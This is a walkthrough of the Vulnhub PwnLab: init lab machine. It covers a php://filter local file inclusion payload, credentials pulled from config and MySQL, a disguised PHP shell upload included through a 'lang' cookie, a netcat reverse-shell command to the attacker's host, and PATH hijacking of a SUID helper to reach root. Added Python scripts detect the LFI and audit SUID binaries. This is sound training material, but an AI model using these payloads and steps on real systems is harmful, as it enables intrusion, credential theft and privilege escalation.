PwnLab: init, Vulnhub Machine Walkthrough

Let's root the PwnLab: init machine from Vulnhub today.

Start by finding the target's IP with an nmap ping sweep.

nmap -sn 192.168.18.0/24

We have the IP now: 192.168.18.100.

Time for a deeper scan.

nmap -p- -A -T5 -sV -O --script vuln  192.168.18.100
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 08:35 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.100
Host is up (0.00097s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags: 
|   /login.php: 
|     PHPSESSID: 
|_      httponly flag not set
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.18.100
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.18.100:80/?page=login
|     Form id: user
|_    Form action: 
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /login.php: Possible admin folder
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_  /upload/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.0.1
|_http-server-header: Apache/2.4.10 (Debian)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:apache:http_server:2.4.10: 
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2017-7668   7.5     https://vulners.com/cve/CVE-2017-7668
|       CVE-2017-3169   7.5     https://vulners.com/cve/CVE-2017-3169
|       CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-2161   5.0     https://vulners.com/cve/CVE-2016-2161
|       CVE-2016-0736   5.0     https://vulners.com/cve/CVE-2016-0736
|       CVE-2014-3583   5.0     https://vulners.com/cve/CVE-2014-3583
|       CVE-2020-11985  4.3     https://vulners.com/cve/CVE-2020-11985
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2015-3185   4.3     https://vulners.com/cve/CVE-2015-3185
|       CVE-2014-8109   4.3     https://vulners.com/cve/CVE-2014-8109
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
111/tcp   open  rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38626/tcp   status
|   100024  1          39233/udp6  status
|   100024  1          52116/udp   status
|_  100024  1          57067/tcp6  status
3306/tcp  open  mysql   MySQL (blocked - too many connection errors)
38626/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:CF:29:7D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.97 ms 192.168.18.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 372.01 seconds

We have a website running on the server. Let's have a look.

A login page. Let's try SQL injection.

Unfortunately it didn't work. But have a look at the login page URL.

http://192.168.18.100/?page=login

Is there an LFI?

I tried but couldn't find any. Then I came across this article.

https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/

Let's try this on config.php.

http://192.168.18.100/?page=php://filter/convert.base64-encode/resource=config

We got something back in base64.

Let's decode this with https://www.base64decode.org/

Now we have the credentials to log in to the MySQL server.

Let's try to log in.

mysql -u root -h 192.168.56.101 -pH4u%QJ_H99

I got an error at first, but fixed the issue with a reboot of the VM.

Let's read the data now.

show databases;

Let's find the tables and the data inside them.

MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.001 sec)

MySQL [Users]> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.005 sec)

Here we have 3 users. The passwords look base64-encoded. Let's decode kent's password.

It is JWzXuBJJNy.

Let's log in as kent.

Let's try to upload a PHP shell.

Let's try sending it as a jpg with Burp.

Change the filename to photo.gif, the Content-Type to image/gif, and add GIF87a as the first line.

We can find our file's location in the response in Burp.

Our file is uploaded, but we can't read it directly. Let's read index.php with the php://filter method used above instead.

Here, a 'lang' cookie is used to load the 'en.lang.php' file.

Let's try changing the value to something else.

Go to Firefox Preferences > Web Developer > Storage and click the + button at the top right to add a cookie.

Cookie name: lang and value: ../upload/3f0d7f3bc6046d5eb636569c8a24ab31.gif

And now the page includes our file.
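Both include paths used above (the page parameter fed a php://filter wrapper, and the lang cookie fed a ../upload/ traversal) leave a clear trace in the web server's logs. As an added detection example, not code from the original walkthrough, this Python script parses Apache combined log lines and flags include parameters that carry a stream wrapper, a traversal, or a value outside an allowlist. It assumes the vhost's LogFormat appends a "%{Cookie}i" field, that the lang cookie carries the file name, and the allowlists and sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit
# Apache "combined" log plus one trailing "%{Cookie}i" field (assumed custom
# LogFormat; the stock combined format does not record cookies).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "[^"]*" "(?P<cookie>[^"]*)"$'
)
# The only values the application itself would ever include (constructed).
PAGE_ALLOWLIST = {"login", "upload", "home"}
LANG_ALLOWLIST = {"en.lang.php"}

def suspicious_value(value):
    """Why an include parameter looks like an LFI attempt, or None if it is clean."""
    v = unquote(value).lower()
    if "://" in v:                      # php://filter, data://, expect://, ...
        return "stream wrapper"
    if "../" in v or "..\\" in v:
        return "path traversal"
    if "\x00" in v:                     # null-byte truncation on old PHP builds
        return "null byte"
    return None

def analyse_line(line):
    """One finding per suspicious 'page' parameter or 'lang' cookie in a log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    pages = parse_qs(urlsplit(m["target"]).query).get("page", [])
    candidates = [("page", p, PAGE_ALLOWLIST) for p in pages]
    cookies = dict(c.strip().split("=", 1) for c in m["cookie"].split(";") if "=" in c)
    if "lang" in cookies:
        candidates.append(("lang", cookies["lang"], LANG_ALLOWLIST))
    findings = []
    for param, value, allowed in candidates:
        reason = suspicious_value(value) or ("" if value in allowed else "not in allowlist")
        if reason:
            findings.append({"ip": m["ip"], "param": param, "value": value, "reason": reason})
    return findings

def scan(lines):
    return [f for line in lines for f in analyse_line(line)]

# Constructed sample lines modelled on the requests made in this walkthrough.
SAMPLE_LOG = [
    '192.168.18.99 - - [16/Aug/2020:08:40:01 -0400] "GET /?page=login HTTP/1.1" 200 1532 "-" "Mozilla/5.0" "PHPSESSID=abc123; lang=en.lang.php"',
    '192.168.18.99 - - [16/Aug/2020:08:41:17 -0400] "GET /?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 412 "-" "Mozilla/5.0" "PHPSESSID=abc123"',
    '192.168.18.99 - - [16/Aug/2020:08:55:03 -0400] "GET / HTTP/1.1" 200 220 "-" "Mozilla/5.0" "PHPSESSID=abc123; lang=../upload/3f0d7f3bc6046d5eb636569c8a24ab31.gif"',
]
```

Running scan(SAMPLE_LOG) reports the second and third lines; the fix on the application side is the same allowlist idea, mapping a short key to a fixed file name instead of passing user input to include().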

Now let's open a reverse shell with netcat. Enter this command in the page.

nc -nv 192.168.18.99 4444 -e /bin/bash

We got a connection.

Now we have the passwords for three users. Let's examine their home directories.

Nothing special here.

Mike's password doesn't work. Let's try kane.

There is a file owned by mike. Let's open it.

Ah! Couldn't read it. What kind of file is this?

An executable. Let's try running it.

kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory

This executable tries to read msg.txt from mike's home directory. That means the cat it runs has access to mike's home directory, which we don't. Right?

What about changing the PATH variable so that 'cat' resolves to a script that runs /bin/bash with the same privileges? Let's try.

kane@pwnlab:~$ echo "/bin/bash" > /tmp/cat
echo "/bin/bash" > /tmp/cat
kane@pwnlab:~$ chmod +x /tmp/cat
chmod +x /tmp/cat
kane@pwnlab:~$ PATH=/tmp:$PATH
PATH=/tmp:$PATH

Now let’s run the executable file.

We are mike now!
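The weakness behind the msgmike step is a privileged helper that runs cat by bare name, so whichever cat comes first on PATH wins. As an added audit example, not code from the original walkthrough, this Python script flags executables that embed such PATH-dependent command lines and checks whether they carry the set-user-ID bit; the sample binary contents and the list of tool names are constructed assumptions.

```python
import os
import re
import stat

PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
# Program names that small SUID helpers commonly hand to system()/popen() (assumed list).
KNOWN_TOOLS = {"cat", "ls", "cp", "mv", "rm", "echo", "sh", "bash", "id", "whoami", "find", "grep"}

def is_setuid_mode(mode):
    """True for a file mode that is executable and carries the set-user-ID bit."""
    executable = mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return bool(mode & stat.S_ISUID) and bool(executable)

def relative_command_strings(blob):
    """Strings in a binary that read as shell command lines with a bare program name.

    'cat /home/mike/msg.txt' is reported (resolved through PATH at run time);
    '/bin/cat /home/mike/msg.txt' is not (absolute path, immune to PATH changes).
    """
    hits = []
    for m in PRINTABLE.finditer(blob):
        text = m.group().decode("ascii")
        for piece in re.split(r"[;&|]+", text):   # one command per pipeline stage
            tokens = piece.strip().split()
            if tokens and "/" not in tokens[0] and tokens[0] in KNOWN_TOOLS:
                hits.append(piece.strip())
    return hits

def audit_file(path):
    """(is_setuid, offending command strings) for one executable on disk."""
    mode = os.stat(path).st_mode
    with open(path, "rb") as fh:
        return is_setuid_mode(mode), relative_command_strings(fh.read())

# Constructed stand-in for the data section of a helper like msgmike: the
# command string is embedded exactly as a system() call would carry it.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"/lib64/ld-linux-x86-64.so.2\x00libc.so.6\x00setuid\x00system\x00"
    + b"cat /home/mike/msg.txt\x00"
    + b"/bin/cat /home/mike/msg.txt\x00"
)
```

A helper that reports both SUID and a hit is the case to fix: use an absolute program path (or execve with a fixed argv) and reset PATH before any shell call.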

Let's have a look at mike's home directory.

There’s a file called msg2root.

It sends a message to root. So, like the previous file, this executable has access to root's files too.

Let's try another method.

We are root.

Let's read the flag now. Before that, we need to copy the real cat binary over our /tmp/cat, since /tmp is still first on our PATH.

Cheers!